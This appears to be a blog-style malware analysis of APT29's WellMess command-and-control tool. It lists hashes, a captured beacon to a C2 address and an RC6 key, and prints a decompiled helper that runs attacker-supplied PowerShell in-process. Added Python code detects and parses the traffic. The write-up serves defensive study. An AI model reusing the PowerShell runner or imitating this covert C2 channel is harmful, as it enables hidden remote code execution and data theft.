Initial Access Tactic Used by APT-29 WellMess
APT29 is a hacker group thought to be associated with the Russian state and its intelligence services, according to information published by the NSA and various cyber security companies. "APT" stands for "Advanced Persistent Threat". Cyber security companies have given the group various nicknames, such as Cozy Bear, CozyDuke and The Dukes.
The APT-29 group carried out its attacks in a highly planned and complex manner. WellMess malware was used in one of the attacks.
WellMess Malware
In order to steal vaccine-related research information from companies researching the Covid-19 vaccine and from universities carrying out R&D activities, the group exploited security vulnerabilities in software such as Citrix, Pulse Secure, FortiGate and Zimbra to gain access to these systems and carry out data theft. WellMess, installed on the vulnerable systems, is a Command and Control tool used for post-exploitation: it allows the attackers to run command lines and to upload or download files on the target system, and it communicates with its operators over an encrypted channel.
It exists as an ELF binary for Linux systems and as a 32-bit PE binary for Windows operating systems.
SHA-256 hash values:
- 0b8e6a11adaa3df120ec15846bb966d674724b6b92eae34d63b665e0698e0193 (Golang&ELF)
- bec1981e422c1e01c14511d384a33c9bcc66456c1274bbbac073da825a3f537d (Golang&PE)
- 2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41 (.Net&PE)
When the malware is run on the target device, it communicates with the Command and Control server controlled by the attackers over an encrypted channel. After this stage, the attackers obtain a reverse shell to execute code on the target system, collect domain group, system and network information, and move on to the next stage: infiltrating another system.
WellMess Web Traffic
POST / HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip
DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D asij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV CcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9 KucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk yPmCpN. 2X35q5 JhXg
The attackers send commands to the target device in the Cookie header of this web traffic. Each command is encrypted with RC6 and then Base64-encoded (Figures 1-3).
(Figure 1)
(Figure-2)
(Figure-3)
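The captured request above carries several traits a defender can match on: an HTTP POST to a DNS port, an outdated Firefox 21 user agent, random eight-character cookie names holding long "+"-joined pseudo-Base64 values, and a form-urlencoded content type with a body that is not a form. The following detection routine, an added example and not code from the original write-up, runs those checks over a sample request constructed from the capture on this page (cookie values and body shortened); the indicator names are my own.

```python
import re

# Constructed from the WellMess request captured on this page (values shortened).
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: 141.98.212.55:53\r\n"
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n"
    "Content-Length: 422\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
    "Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; "
    "OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
    "DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494"
)

def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def wellmess_indicators(raw):
    """Return the list of WellMess-style traits present in one HTTP request."""
    request_line, headers, body = parse_request(raw)
    hits = []
    host = headers.get("host", "")
    port = host.rsplit(":", 1)[1] if ":" in host else "80"
    if request_line.startswith("POST") and port == "53":
        hits.append("http-post-to-port-53")          # HTTP beacon on the DNS port
    ua = headers.get("user-agent", "")
    if "Firefox/21.0" in ua and "Ubuntu" in ua:
        hits.append("stale-firefox-21-user-agent")   # 2013-era browser string
    cookie = headers.get("cookie", "")
    for name, value in re.findall(r"(\w+)=([^;]+)", cookie):
        # random 8-char cookie names carrying long '+'-joined pseudo-Base64 chunks
        if len(name) == 8 and len(value) > 40 and value.count("+") >= 4:
            hits.append(f"opaque-cookie:{name}")
    ctype = headers.get("content-type", "")
    if "x-www-form-urlencoded" in ctype and "=" not in body and " " in body:
        hits.append("form-content-type-without-form-body")
    return hits
```

Any single hit is weak on its own; alerting on two or more together keeps the rule quiet on ordinary browser traffic.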
The WellMess variant (.NET version) developed for Windows operating systems uses PowerShell to exploit systems such as Active Directory on the target device. The decompiled helper it uses for this is shown below.

    // Namespaces required by this method
    using System.Collections.ObjectModel;
    using System.Management.Automation;
    using System.Management.Automation.Runspaces;

    // Runs an attacker-supplied script in an in-process PowerShell runspace
    // (no powershell.exe is spawned) and returns the concatenated output.
    private static string Pshell(string script)
    {
        string empty = string.Empty;
        Collection<PSObject> collection;
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            try
            {
                runspace.Open();
                using (PowerShell powerShell = PowerShell.Create())
                {
                    powerShell.Runspace = runspace;
                    // The script is wrapped in a ScriptBlock and executed via Invoke-Command
                    ScriptBlock scriptBlock = ScriptBlock.Create(script);
                    powerShell.AddCommand("Invoke-Command").AddParameter("ScriptBlock", (object) scriptBlock);
                    collection = powerShell.Invoke();
                }
            }
            finally
            {
                runspace.Close();
            }
        }
        // Every returned PSObject is flattened into one string for the C2 reply
        foreach (PSObject psObject in collection)
            empty += psObject.ToString();
        return empty;
    }
Encrypted Connection Established by Attackers with the Target Device
RC6 key used to encrypt incoming and outgoing data:
- OHVbn3Fdv/sgvP9VRO/9OQ==
The command sent, encrypted, to the target system by the attackers:
- HNX7A5nA=UUn5+2g6J+emwEU+MSkFqW+FAtoNc+dtFnr.+dHFn3ip+P8I+r19+B7s+UM571cp+j6hf+BvdjukE+YxeSiW.+SNXbt+VIB4fxC+CLa9el+eVHm+RspIMTQ+Z57y5+ZyY5 tA6
Encrypted web traffic coming from the target system:
- <;head;>3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<;head ;><;title;>rc<;title;><;service;><;service;>
In the last stage, the data as it reaches the attackers, after decryption and decoding:
200.200.200.221||user|user e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
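The response above uses a simple framing: each field sits between two identical <;name;> markers (the closing one may carry a stray space, as in "<;head ;>"), and the head field is hex-encoded text followed by a 32-byte digest. The parser below is an added example, not code from the original write-up; it decodes the page's own sample, and the observation that the trailing digest equals the SHA-256 of empty input is mine, not something the page states.

```python
import hashlib
import re

# Sample taken from the response line on this page.
SAMPLE_RESPONSE = (
    "<;head;>3230302e3230302e3230302e3232317c7c757365727c75736572"
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<;head ;>"
    "<;title;>rc<;title;><;service;><;service;>"
)

# Same marker on both sides of a field; '\s*' tolerates the space in "<;head ;>".
FIELD_RE = re.compile(r"<;(\w+)\s*;>(.*?)<;\1\s*;>", re.S)

def split_fields(payload):
    """Return {name: raw_text} for every <;name;>...<;name;> field in the payload."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(payload)}

def decode_head(hex_text):
    """Split the hex head field into its ASCII prefix and trailing 32-byte digest."""
    raw = bytes.fromhex(hex_text)
    text, digest = raw[:-32], raw[-32:]
    # prefix observed on this page: "<ip>||<text>" (the meaning of the '|'-joined
    # remainder is an assumption; it is returned unchanged)
    ip, _, ident = text.decode("ascii").partition("||")
    return {"ip": ip, "ident": ident, "digest": digest.hex()}

def parse_beacon(payload):
    fields = split_fields(payload)
    info = decode_head(fields["head"])
    info["title"] = fields.get("title", "")
    info["service"] = fields.get("service", "")
    # an empty-input SHA-256 means no additional data accompanied this beacon
    info["digest_is_empty_sha256"] = info["digest"] == hashlib.sha256(b"").hexdigest()
    return info
```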
In summary,
The APT-29 group operates inside target systems as covertly and quietly as possible while carrying out cyber espionage (they generally use ports 443, 80 and 53 for their connections). If the data to be stolen is highly valuable, the group moves much more slowly in the target system. After completing their operations and obtaining the data they want, they are very careful not to leave traces on the system.
The most important lesson to be learned from such attacks is that companies should keep the software they use regularly updated. Keeping software up to date significantly reduces the chance that critical security vulnerabilities in it are exploited by threat actors.